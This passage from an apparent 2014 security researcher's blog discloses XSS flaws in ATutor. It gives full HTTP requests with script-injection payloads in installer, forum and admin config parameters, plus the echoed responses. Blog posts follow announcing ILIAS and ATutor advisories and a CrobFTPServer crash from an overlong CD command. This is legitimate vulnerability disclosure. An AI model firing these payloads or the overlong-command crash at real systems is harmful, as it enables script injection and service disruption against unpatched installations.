action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
---<request>---


---<response>---
<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
---<response>---

--> tb_prefix and new_version parameter are also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 667

action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB

---<request>---

Vulnerable to XSS are also parameters:
step2%5Bnew_version%5D
step2%5Bdb_host%5D
step2%5Bdb_port%5D
step2%5Bdb_login%5D
step2%5Bdb_password%5D
step2%5Bdb_name%5D
step2%5Btb_prefix%5D


# ==============================================================
# 3. Persistent XSS (from admin)

---<request>---
POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 108

add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
---<request>---

---<response>---
<span class="required" title="Required Field">*</span><label for="title">Title</label><br />
    <input type="text" name="title" size="40" id="title" value="'>"><body/onload=alert(9999)>" />
  </div>
---<response>---



# ==============================================================
# 4. Edit config (from admin user):

---<request>---
POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 946

site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
---<request>---
 
If you have any questions, feel free to ask directly (via mail or comments).
 
Thanks ;) 


Saturday 22 February 2014

[EN] Two more publications

And here we go again ;)

In the "public" section here, you can find 2 more list to publication about
two webapplications tested last days: ILIAS and ATutor (in latest version of course).

If you have any questions, feel free to ask.
I will answer ASAP (as always;) ).

Cheers
o/

Tuesday 18 February 2014

[EN] CrobFTPServer DoS

During fuzzing some old apps I found an interesting behavior of one of the FTP servers - CrobFTPServer.

When you will send to the server a "CD" command longer that 500 A's
the server will stop ;)

CrobFTP Server - DoS  

Check it out ;)

It seems that there is more bugs;)